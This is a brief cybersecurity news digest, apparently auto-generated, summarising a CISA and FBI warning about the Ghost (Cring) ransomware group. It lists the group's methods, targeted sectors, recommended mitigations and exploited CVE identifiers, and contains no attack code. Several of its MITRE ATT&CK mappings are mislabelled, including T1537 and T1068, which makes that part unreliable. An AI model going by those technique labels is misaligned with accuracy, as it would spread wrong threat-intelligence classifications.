Cyber Security News

CISA and FBI Warn of Global Threat from Ghost Ransomware

iocOne
CISA and FBI Warn of Global Threat from Ghost Ransomware

The β€œGhost” ransomware group, also known by several names such as Cring and Crypt3r, has been disclosed by US authorities for compromising organizations worldwide, primarily using exploitation of known vulnerabilities and well-known malware tools. The group’s activities span over 70 countries, targeting various sectors including SMBs and critical infrastructure. Affected: organizations, SMBs, critical infrastructure, schools, universities, healthcare, government, religious institutions, technology, manufacturing

Keypoints :

  • The Ghost ransomware group operates from China, differing from most actors found in former Soviet states.
  • They compromise organizations in over 70 countries with financially motivated attacks.
  • Initial access is achieved through vulnerabilities in public-facing systems and servers.
  • Notable exploited vulnerabilities include those in Fortinet FortiOS, Adobe ColdFusion, Microsoft SharePoint, and Microsoft Exchange.
  • Ghost actors deploy Cobalt Strike as their primary tool for various attack vectors.
  • The group often issues ransom notes claiming exfiltrated data will be sold if demands are not met.
  • Typically, they do not exfiltrate significant data that could cause major harm to victims.
  • Ghost actors show a preference for easier targets and often abandon attempts against hardened systems.
  • CISA recommends key mitigations such as regular backups, timely patches for known vulnerabilities, network segmentation, and the use of multi-factor authentication.

MITRE Techniques :

  • T1071.001 – Application Layer Protocol: Ghost actors leverage Cobalt Strike for command and control communications.
  • T1083 – File and Directory Discovery: Used to identify which anti-malware systems are present on victim machines.
  • T1059.001 – Command and Scripting Interpreter: PowerShell is utilized for executing commands and downloading additional malware.
  • T1068 – Exploitation for Elevation of Privilege: Exploiting vulnerabilities in public-facing systems for initial access.
  • T1537 – Transfer Data to External Network: Sending ransom notes claiming data exfiltration, despite limited actual data theft.

Indicator of Compromise :

  • [Vulnerability] CVE-2018-13379
  • [Vulnerability] CVE-2010-2861
  • [Vulnerability] CVE-2009-3960
  • [Vulnerability] CVE-2021-34473
  • [Vulnerability] CVE-2021-34523
  • [Vulnerability] CVE-2021-31207

Full Story: https://www.infosecurity-magazine.com/news/cisa-fbi-warn-global-threat-ghost/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint